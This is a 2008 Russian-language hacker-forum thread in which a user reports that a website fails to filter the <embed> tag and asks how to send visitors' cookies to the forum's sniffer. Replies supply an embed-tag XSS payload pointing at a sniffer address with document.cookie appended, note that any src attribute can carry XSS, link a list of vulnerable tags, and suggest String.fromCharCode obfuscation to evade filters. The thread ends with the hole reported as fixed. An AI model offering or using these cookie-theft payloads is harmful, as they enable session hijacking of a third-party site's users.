использование тега embed для угона cookies ?

Discussion in 'Песочница' started by ickhz, 13 Dec 2008.

  1. ickhz

    ickhz New Member

    Joined:
    1 Dec 2008
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Обнаружила, что на сайте на фильтруется тег <embed> и javascript в нем. ТО есть работает конструкция <embed src=javascript:alert('ok');this.avi>.. Подскажите, как прописать здесь скрипт, чтобы работала передача cookies на сниффер античата.
     
    #1 ickhz, 13 Dec 2008
  2. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    также, как и обычно
     
    #2 Pashkela, 13 Dec 2008
  3. Велемир

    Велемир Banned

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Везде,где есть атрибут src,есть возможность эксплуатации XSS,не учитывая существования фильтров.
     
    #3 Велемир, 14 Dec 2008
  4. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    В XSS не особо,но по моему так:
    <embed src=javascript:src='адрес снифера';this.avi>
     
    #4 -m0rgan-, 14 Dec 2008
  5. Велемир

    Велемир Banned

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    +document.cookie :D
     
    #5 Велемир, 14 Dec 2008
    2 people like this.
  6. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Бля,точно,пропустил:(
    спс за поправку!
     
    #6 -m0rgan-, 14 Dec 2008
    1 person likes this.
  7. Велемир

    Велемир Banned

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    :):) Вообще,есть список *уязвимых* тегов касательно XSS.
    http://www.inattack.ru/article/519.html к примеру,но был список и получше...
     
    #7 Велемир, 14 Dec 2008
  8. ickhz

    ickhz New Member

    Joined:
    1 Dec 2008
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    А, поняла, там фигня какая-то хитрая по-моему, которая не дает забрать cookies..

    alert(document.cookies) выдает вместо cookies undefined

    Типа защита такая что-ли))))
     
    #8 ickhz, 15 Dec 2008
  9. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    ickhz, он это выдает тк нету такого объекта, как document.cookies, есть document.cookie.
     
    #9 freddi, 15 Dec 2008
  10. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    попробуй прогнать скрипт через StringFromCharCode
    http://pro.grammatic.org/post-javascript-eval-stringfromcharcode-encoder-11.aspx
     
    #10 iddqd, 15 Dec 2008
    1 person likes this.
  11. ickhz

    ickhz New Member

    Joined:
    1 Dec 2008
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Точно.. сорри! Теперь выводит пустой алерт.
     
    #11 ickhz, 16 Dec 2008
  12. ickhz

    ickhz New Member

    Joined:
    1 Dec 2008
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Спс
     
    #12 ickhz, 16 Dec 2008
  13. Велемир

    Велемир Banned

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Естессно ничего не выведет,ибо пофиксено.
     
    #13 Велемир, 21 Dec 2008
  14. ickhz

    ickhz New Member

    Joined:
    1 Dec 2008
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Да, к сожалению, именно так.. (
     
    #14 ickhz, 29 Dec 2008
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.